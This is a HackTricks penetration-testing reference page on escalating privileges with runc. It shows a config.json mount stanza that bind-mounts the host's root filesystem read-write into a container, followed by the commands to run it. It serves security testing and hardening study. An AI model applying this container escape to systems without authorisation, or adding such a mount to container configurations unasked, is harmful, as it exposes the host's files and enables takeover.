runc-privilege-escalation.md (2132B)
1 --- 2 title: "RunC Privilege Escalation" 3 section: "Linux" 4 sectionSlug: "linux-hardening" 5 sourcePath: "src/linux-hardening/containers-namespaces/runc-privilege-escalation.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/runc-privilege-escalation.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # RunC Privilege Escalation 14 15 ## Basic information 16 17 If you want to learn more about **runc** check the following page: 18 19 [2375 Pentesting Docker](/hacktricks/network-services-pentesting/2375-pentesting-docker) 20 21 ## PE 22 23 If `runc` is available to a rootful process on the host, you can use an OCI bundle whose mount configuration recursively bind-mounts the host's `/` at `/` inside the container, exposing the host filesystem in that mount namespace.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup> 24 25 ```bash 26 runc -help #Get help and see if runc is intalled 27 runc spec #This will create the config.json file in your current folder 28 29 Inside the "mounts" section of the create config.json add the following lines: 30 { 31 "type": "bind", 32 "source": "/", 33 "destination": "/", 34 "options": [ 35 "rbind", 36 "rw", 37 "rprivate" 38 ] 39 }, 40 41 #Once you have modified the config.json file, create the folder rootfs in the same directory 42 mkdir rootfs 43 44 # Finally, start the container 45 # The root folder is the one from the host 46 runc run demo 47 ``` 48 49 > [!CAUTION] 50 > The documented `runc run` workflow is rootful: runc's own examples label it "run as root." An unprivileged user needs a rootless configuration such as `runc spec --rootless`, and runc documents that user namespaces must be enabled for that mode.<sup>[[1]](#references)</sup> 51 52 ## References 53 54 - [1] [runc: CLI tool for spawning and running containers](https://github.com/opencontainers/runc#using-runc) 55 - [2] [OCI Runtime Specification: Mounts](https://github.com/opencontainers/runtime-spec/blob/main/config.md#mounts) 56 - [3] [Shared Subtrees](https://docs.kernel.org/filesystems/sharedsubtree.html)